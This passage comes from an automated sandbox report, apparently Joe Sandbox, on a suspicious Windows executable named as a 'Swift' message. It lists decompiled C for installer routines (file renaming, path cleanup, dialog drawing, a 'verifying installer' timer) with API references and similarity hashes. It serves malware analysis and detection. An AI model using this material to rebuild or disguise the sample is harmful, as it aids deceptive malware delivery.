									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405D74(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x4308e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00405ece
0x00405ed7
0x00405ede
0x00405ee8
0x00405efc
0x00405f24
0x00405f2f
0x00405f33
0x00405f53
0x00405f5a
0x00405f64
0x00405f71
0x00405f76
0x00405f7b
0x00405f7f
0x00405f8e
0x00405f90
0x00405f9d
0x00405fa1
0x0040603c
0x00000000
0x00405fb7
0x00405fc4
0x00405fe8
0x00405fec
0x0040600b
0x0040600f
0x0040600f
0x00406011
0x0040601a
0x00406025
0x00406030
0x00406036
0x00000000
0x00406036
0x00405fee
0x00405ff1
0x00405ffc
0x00405ff8
0x00405ffa
0x00405ffb
0x00405ffb
0x00406003
0x00406005
0x00000000
0x00406005
0x00405fcf
0x00405fd5
0x00000000
0x00405fd5
0x00405fa1
0x00405f7f
0x00405efe
0x00405f09
0x00405f12
0x00405f16
0x00000000
0x00000000
0x00405f16
0x00406047

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406069,?,?), ref: 00405F09
GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F12

Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B

GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F2F
wsprintfA.USER32 ref: 00405F4D
GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405F88
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F97
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406025
GlobalFree.KERNEL32(00000000), ref: 00406036
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603D

Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A

Strings

[Rename], xrefs: 00405FB7, 00405FC9
%ls=%ls, xrefs: 00405F43

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 4764efec6bbb625c57c3953ed88dd39e9a4d7ef93366e848611a72397d906ad3
Instruction ID: 79e357045524b81a8ea21183b2a6189fe473d9766cb3db532b5e95eed637b89f
Opcode Fuzzy Hash: 4764efec6bbb625c57c3953ed88dd39e9a4d7ef93366e848611a72397d906ad3
Instruction Fuzzy Hash: D1315771100B05ABD220AB669D48F6B3A9CDF45744F15003FF902F62D2EA7CD9118ABC

Uniqueness

Uniqueness Score: -1.00%

Function 00406516 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00406516(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405BCA(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405B80(L"*?|<>/\":", _t5))) == 0) {
							E00405D2F(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00406518
0x00406521
0x00406538
0x00406538
0x0040653f
0x0040654b
0x0040654b
0x0040654e
0x00406551
0x00406556
0x00406558
0x00406561
0x00406565
0x00406582
0x0040658a
0x0040658a
0x0040658f
0x00406591
0x00406594
0x00406599
0x0040659a
0x0040659e
0x0040659e
0x0040659f
0x004065a6
0x004065a8
0x004065af
0x00000000
0x00000000
0x004065b7
0x004065bd
0x00000000
0x00000000
0x00000000
0x004065bd
0x004065c2

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe",0040334E,C:\Users\user\AppData\Local\Temp\,76203420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe",0040334E,C:\Users\user\AppData\Local\Temp\,76203420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe",0040334E,C:\Users\user\AppData\Local\Temp\,76203420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0

Strings

*?|<>/":, xrefs: 00406568
"C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe", xrefs: 00406516
C:\Users\user\AppData\Local\Temp\, xrefs: 00406517, 0040651C

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3672840124
Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
Instruction ID: 662237d401549a0b86d5a4e6e01ff77a7750504751085e1aca306c60b5ffe750
Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
Instruction Fuzzy Hash: 3911B655800612A5D7303B18BC40AB776B8EF68750B52403FED8A732C5E77C5CA286BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040427E Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040427E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x00404290
0x00404324
0x00000000
0x00404324
0x004042a1
0x004042a5
0x00000000
0x00000000
0x004042ab
0x004042b4
0x004042b7
0x004042b7
0x004042bd
0x004042c3
0x004042c3
0x004042cf
0x004042d5
0x004042dc
0x004042df
0x004042e2
0x004042e4
0x004042e4
0x004042ec
0x004042f2
0x004042f2
0x004042fc
0x00404301
0x00404304
0x00404309
0x0040430c
0x0040430c
0x0040431c
0x0040431c
0x00000000

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040429B
GetSysColor.USER32(00000000), ref: 004042B7
SetTextColor.GDI32(?,00000000), ref: 004042C3
SetBkMode.GDI32(?,?), ref: 004042CF
GetSysColor.USER32(?), ref: 004042E2
SetBkColor.GDI32(?,?), ref: 004042F2
DeleteObject.GDI32(?), ref: 0040430C
CreateBrushIndirect.GDI32(?), ref: 00404316

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
Instruction ID: b3876bbcbbff373df079470ccdc5149205509338ab7e68b668f4883140def8c6
Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
Instruction Fuzzy Hash: B22151B1600704ABCB219F68DE08B5BBBF8AF41714F04897DFD96E26A0D734E944CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004052E6 Relevance: 10.6, APIs: 7, Instructions: 72
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004052E6(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x433ec4;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x434fb4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004062A4(_t38, 0, 0x42c228, 0x42c228, _a4);
					}
					_t27 = lstrlenW(0x42c228);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x433ea8, 0x42c228);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42c228;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x42c228[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x42c228, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x004052ec
0x004052f6
0x004052fb
0x00405301
0x0040530c
0x0040530f
0x00405312
0x00405318
0x00405318
0x0040531e
0x00405326
0x00405329
0x00405346
0x0040534a
0x00405353
0x00405353
0x0040535d
0x00405366
0x00405372
0x00405379
0x0040537d
0x00405380
0x00405393
0x004053a1
0x004053a1
0x004053a5
0x004053a7
0x004053aa
0x00000000
0x004053aa
0x0040532b
0x00405333
0x0040533b
0x00405341
0x00000000
0x00405341
0x0040533b
0x00405329
0x004053b6

APIs

lstrlenW.KERNEL32(0042C228,00000000,0041D800,762023A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,762023A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
lstrcatW.KERNEL32(0042C228,0040325E), ref: 00405341
SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 431f9b9f519d5dcc2d02559eb98ffe4ebe6b5718b6beea2b4038e3bce57f3186
Instruction ID: 0b7e0c68d9dca976d3f5af37e2abe0e5b3dfc86658143eccbc3f009734cc3570
Opcode Fuzzy Hash: 431f9b9f519d5dcc2d02559eb98ffe4ebe6b5718b6beea2b4038e3bce57f3186
Instruction Fuzzy Hash: 3F21A171900518BACF11AFA5DD859CFBFB4EF85350F14817AF944B6290C7B98A90CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404BB0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404BB0(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404bbe
0x00404bcb
0x00404bd1
0x00404c0f
0x00404c0f
0x00404c1e
0x00404c25
0x00000000
0x00404c27
0x00404bd3
0x00404be2
0x00404bea
0x00404bed
0x00404bff
0x00404c05
0x00404c0c
0x00000000
0x00404c0c
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BCB
GetMessagePos.USER32 ref: 00404BD3
ScreenToClient.USER32(?,?), ref: 00404BED
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BFF
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C25

Strings

f, xrefs: 00404C01

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: fcc096391eddebe8eb85a5aa76d4b30f922b4a39187f2a8acbab72006efdbce5
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: 31015E71900218BAEB10DB94DD85BFEBBBCAF95B11F10412BBA50B62D0D7B499418BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401DB3(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402C15(2);
				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
				0x40cdd8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40cde8 = E00402C15(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
				 *0x40cdef = 1;
				 *0x40cdec = _t15 & 0x00000001;
				 *0x40cded = _t15 & 0x00000002;
				 *0x40cdee = _t15 & 0x00000004;
				E004062A4(_t9, _t31, _t33, "Calibri",  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectW(0x40cdd8);
				_push(_t18);
				_push(_t33);
				E004061C9();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401db3
0x00401dbe
0x00401dc0
0x00401dcd
0x00401de4
0x00401de9
0x00401df6
0x00401dfb
0x00401dff
0x00401e0a
0x00401e11
0x00401e23
0x00401e29
0x00401e2e
0x00401e38
0x0040258c
0x0040156d
0x00402a65
0x00402ac2
0x00402ace

APIs

GetDC.USER32(?), ref: 00401DB6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
ReleaseDC.USER32(?,00000000), ref: 00401DE9
CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E38

Strings

Calibri, xrefs: 00401E1E

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Calibri
API String ID: 3808545654-1409258342
Opcode ID: 8f9191b43f1087fd91e2bc6620e9991732759c8a76e5fb6f86f4dddf7fac1548
Instruction ID: 8058adb7fc53f801c03006c9ef56a62efa99793a140a93f16ed6c143b7d909dc
Opcode Fuzzy Hash: 8f9191b43f1087fd91e2bc6620e9991732759c8a76e5fb6f86f4dddf7fac1548
Instruction Fuzzy Hash: 9A015271944240EFE701ABB4AE8A6D97FB49F95301F10457EE241F61E2CAB800459F2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DD7(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x4169f8; // 0x5c9bd
					_t11 =  *0x422a04; // 0x5c9c1
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402de7
0x00402df5
0x00402dfb
0x00402dfb
0x00402e09
0x00402e0b
0x00402e11
0x00402e18
0x00402e1a
0x00402e1a
0x00402e30
0x00402e40
0x00402e52
0x00402e52
0x00402e5a

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
MulDiv.KERNEL32(0005C9BD,00000064,0005C9C1), ref: 00402E20
wsprintfW.USER32 ref: 00402E30
SetWindowTextW.USER32(?,?), ref: 00402E40
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52

Strings

verifying installer: %d%%, xrefs: 00402E2A

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
Instruction ID: 0244175548504e0de7267acb57bf05e9e9b1595e8d7e84e5cb6d98a661a40fbb
Opcode Fuzzy Hash: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
Instruction Fuzzy Hash: B6014470640208BBDF209F50DE49FAA3B69BB00304F008039FA46A51D0DBB889558B59

Uniqueness

Uniqueness Score: -1.00%

Function 100024A4 Relevance: 9.1, APIs: 6, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E100024A4(intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr* _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t35;
				void* _t39;
				intOrPtr _t40;
				void* _t43;

				_t39 = E1000121B();
				_t24 = _a4;
